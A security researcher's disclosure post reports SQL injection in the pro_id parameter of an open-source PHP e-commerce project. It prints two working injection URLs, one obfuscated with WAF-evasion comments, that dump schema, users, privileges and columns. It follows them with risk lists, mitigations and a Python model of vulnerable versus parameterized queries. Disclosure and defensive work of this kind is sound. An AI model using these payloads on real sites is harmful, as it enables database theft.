
E-commerce 1.0 | details.php?pro_id= SQL Injection | Found By Maloy Roy Orko

Hi All, 


I am Maloy Roy Orko.

Recently, during one of my pentest research sessions, I found Ecommerce-Website-using-PHP, Bootstrap4, Html5, Css3 by SHAHID AFRIDI ZIHAD, which is an open source e-commerce application written in native PHP.

Curious to explore its functionality, I downloaded it and set it up on my local system.

After fiddling with the source code, I found that it did not have any kind of SQL injection protection.

This puts the data of every user at risk: the database can be leaked by attackers, and the admin panel credentials are exposed as well.

The main thing is: if any non-IT person uses this template, they will inherit this vulnerability, and their company's reputation can be damaged as well. That is why I am trying to inform everyone about this.

Title of the Vulnerability: E-commerce 1.0 | details.php?pro_id= SQL Injection | Found By Maloy Roy Orko  

Vulnerability Class: SQL Injection

Product Name: E-commerce 1.0

Vendor: https://github.com/s-a-zhd/

Vulnerable Product Link: 

https://github.com/s-a-zhd/Ecommerce-Website-using-PHP

Technical Details & Description: The application source code is written in a way that allows SQL injection. This puts the data of every user at risk: the database can be leaked by attackers, and the admin panel credentials are exposed as well.


Product & Service Introduction: Ecommerce-Website-using-PHP, Bootstrap4, Html5, Css3

Observation & Exploitation: 

Let's look at the source code.

File: details.php



You can see that there is no defense or filter against SQL injection. The script simply takes the ID from the request and then fetches data from the database according to it.

So let's see how I exploited it. What is the exploitable parameter here?

That is: details.php?pro_id=

Let's take an example and then see the exploit used here.

Vulnerable Place:

http://192.168.0.100:8080/ecom/details.php?pro_id=17

So, let's see an approach and the result.



My exploit for this information disclosure:

http://192.168.0.100:8080/ecom/details.php?pro_id=17'AND+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),12--+


Let's see another approach to exploiting the SQL injection:


The exploit I used:

http://192.168.0.100:8080/ecom/details.php?pro_id=17'AND+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,/*!50000concat/**Darknet-Haxor**/*/(0x223e273e3c2f7469746c653e,0x3c6c696e6b2072656c3d227374796c6573686565742220687265663d2268747470733a2f2f646576656c6f706d656e742e67756172646972616e2e6f72672f7075626c69632f6f6666696369616c2d6465666163652d706167652f646570656e64656e636965732f6373732f726f6f742e6373732220747970653d22746578742f637373223e,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,0x4d616c6f7920526f79204f726b6f,0x3c2f68333e3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d7265643e56657273696f6e202d2d3e203c666f6e7420636f6c6f723d626c75653e,/*!50000VerSiOn/**xnxx**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d7265643e55736572202d2d3e203c666f6e7420636f6c6f723d626c75653e,/*!50000UsEr/**Darknet-Haxor**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d7265643e4461746162617365202d2d3e203c666f6e7420636f6c6f723d626c75653e,/*!50000DaTabaSe/**Darknet-Haxor**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e546f74616c2044617461626173653c2f74723e3c2f74683e3c74723e3c746820636f6c7370616e3d2232223e,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**xnxx**/*/(@w:=0x00) 
,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000InFOrMATIoN_SChEmA/**Darknet-Haxor**/*/.SCheMaTA)/*!50000WhErE/**Darknet-Haxor**/*/(@w)IN(@w:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@w,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e,/*!50000sCheMa_NaMe/**Darknet-Haxor**/*/,0x3c62723e))))w),0x3c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e557365722050726976696c6567653c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**xnxx**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000INFOrmATiON_SChEmA/**Darknet-Haxor**/*/.UsER_PRIViLEgES)/*!50000WhERE/**Darknet-Haxor**/*/(@z)IN(@z:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@z,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f74683e3c2f74723e,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,(selEct(@x)/*!50000fRom/**Darknet-Haxor**/*/(/*!50000sElect/**Darknet-Haxor**/*/(@x:=0x00),(sElect(0)/*!From/**Darknet-Haxor**/*/(/*!50000inforMation_schEma.coLuMns/**Darknet-Haxor**/*/)/*!50000Where/**Darknet-Haxor**/*/(taBle_schema=/*!50000DatAbase/**Darknet-Haxor**/*/())and(0x00)in(@x:=/*!50000coNcat/**Darknet-Haxor**/*/(@x,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000tAble_naMe/**Darknet-Haxor**/*/,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000colUmn_naMe/**Darknet-Haxor**/*/,0x3c2f666f6e743e3c2f74643e3c2f74723e))))x)),12--+


Guess what?

It is clearly a SQL injection vulnerability.

Risks of SQL Injection

  1. Data Breach: Attackers can gain unauthorized access to sensitive data, including personal information, financial records, and confidential business information.
  2. Data Manipulation: Attackers can modify, delete, or insert data into the database, leading to data integrity issues and loss of critical information.
  3. Authentication Bypass: SQL injection can allow attackers to bypass authentication mechanisms, gaining unauthorized access to user accounts or administrative functions.
  4. Remote Code Execution: In some cases, SQL injection can lead to the execution of arbitrary code on the server, allowing attackers to take control of the server.
  5. Denial of Service (DoS): Attackers can exploit SQL injection to execute heavy queries that can slow down or crash the database.
  6. Privilege Escalation: Attackers can exploit SQL injection to gain higher privileges than intended, allowing them to perform actions that should be restricted.
  7. Data Exfiltration: Attackers can extract large volumes of data from the database, which can be used for identity theft, fraud, or sold on the dark web.
  8. Reputation Damage: Organizations that suffer from SQL injection attacks may face reputational damage, loss of customer trust, and potential legal consequences.

Impacts of SQL Injection

  1. Financial Loss: The costs associated with a data breach can be significant, including legal fees, regulatory fines, and costs related to remediation and recovery.
  2. Legal Consequences: Organizations may face lawsuits or regulatory penalties for failing to protect sensitive data, especially if they are subject to data protection regulations (e.g., GDPR, HIPAA).
  3. Operational Disruption: A successful SQL injection attack can disrupt business operations, leading to downtime and loss of productivity.
  4. Loss of Intellectual Property: Attackers may gain access to proprietary information, trade secrets, or other intellectual property, which can be detrimental to a business's competitive advantage.
  5. Increased Security Costs: Organizations may need to invest in enhanced security measures, such as application firewalls, security audits, and employee training, to prevent future attacks.
  6. Customer Trust Erosion: Customers may lose trust in an organization that has experienced a data breach, leading to decreased customer loyalty and potential loss of business.

Mitigation Strategies

To mitigate the risks associated with SQL injection, organizations should implement the following strategies:

  1. Parameterized Queries: Use prepared statements and parameterized queries to ensure that user input is treated as data, not executable code.
  2. Input Validation: Validate and sanitize all user inputs to ensure they conform to expected formats and types.
  3. Least Privilege Principle: Limit database user permissions to the minimum necessary for application functionality.
  4. Web Application Firewalls (WAF): Deploy WAFs to help detect and block SQL injection attempts.
  5. Regular Security Audits: Conduct regular security assessments and code reviews to identify and remediate vulnerabilities.
  6. Security Awareness Training: Educate developers and staff about secure coding practices and the risks associated with SQL injection.
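The following Python/SQLite model is an added example, not code from the Ecommerce-Website-using-PHP project or from this post's author. It stands in for the `details.php?pro_id=` pattern described above (the request parameter pasted straight into the query) and places the first three mitigations next to it: integer validation, a parameterized query, and a simple detection check a logging or WAF layer could apply to the parameter. The `products` table, its columns and the sample rows are constructed assumptions; the project's real schema is not on this page.

```python
import sqlite3

# Constructed sample catalogue standing in for the shop's product table.
# Table and column names are assumptions, not taken from the project.
SAMPLE_PRODUCTS = [
    (17, "USB-C cable", 9.99),
    (18, "Mechanical keyboard", 79.00),
    (19, "Webcam", 45.50),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed products."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (pro_id INTEGER PRIMARY KEY, name TEXT, price REAL)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    conn.commit()
    return conn


def fetch_product_vulnerable(conn, pro_id):
    """Models the pattern the advisory describes: the raw request value is
    interpolated into the SQL text, so whatever the client sends becomes
    part of the statement instead of a value compared against pro_id."""
    query = f"SELECT pro_id, name, price FROM products WHERE pro_id = {pro_id}"
    return conn.execute(query).fetchall()


def fetch_product_safe(conn, pro_id):
    """Hardened lookup: validate the type first, then bind the value through a
    placeholder so the driver always treats it as data, never as SQL."""
    try:
        pro_id_int = int(pro_id)
    except (TypeError, ValueError):
        return []  # anything that is not an integer id is rejected outright
    if pro_id_int <= 0:
        return []
    return conn.execute(
        "SELECT pro_id, name, price FROM products WHERE pro_id = ?",
        (pro_id_int,),
    ).fetchall()


def detect_suspicious_pro_id(pro_id):
    """Server-side check for a request log or WAF rule: a product id should be
    all digits, so any other character in this parameter is worth alerting on."""
    return not str(pro_id).isdigit()


if __name__ == "__main__":
    conn = make_db()
    benign = "17"
    tampered = "17 OR 1=1"  # constructed tampered value: a tautology appended to the id
    print("vulnerable, benign  :", fetch_product_vulnerable(conn, benign))
    print("vulnerable, tampered:", fetch_product_vulnerable(conn, tampered))
    print("safe, benign        :", fetch_product_safe(conn, benign))
    print("safe, tampered      :", fetch_product_safe(conn, tampered))
    print("flagged for review  :", detect_suspicious_pro_id(tampered))
```

With the tampered value the vulnerable function returns the whole catalogue, while the safe function returns nothing because `int()` rejects the string before any SQL runs. The PHP equivalent of `fetch_product_safe` is a PDO prepared statement (`$stmt = $pdo->prepare('... WHERE pro_id = ?'); $stmt->execute([(int) $_GET['pro_id']]);`) or the matching `mysqli` `prepare`/`bind_param` calls. The least-privilege item also matters for the payloads shown earlier: they enumerate `information_schema`, which only exposes objects the connected account has rights to, so a read-only database user limited to the shop's own tables shrinks what such a query can reveal.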

Conclusion:


The main aim of this article is to show that if any non-IT person uses this template, they will inherit this vulnerability, and their company's reputation can be damaged as well. But I also hope that it gives you ideas of how combining attacks can make them much more potent.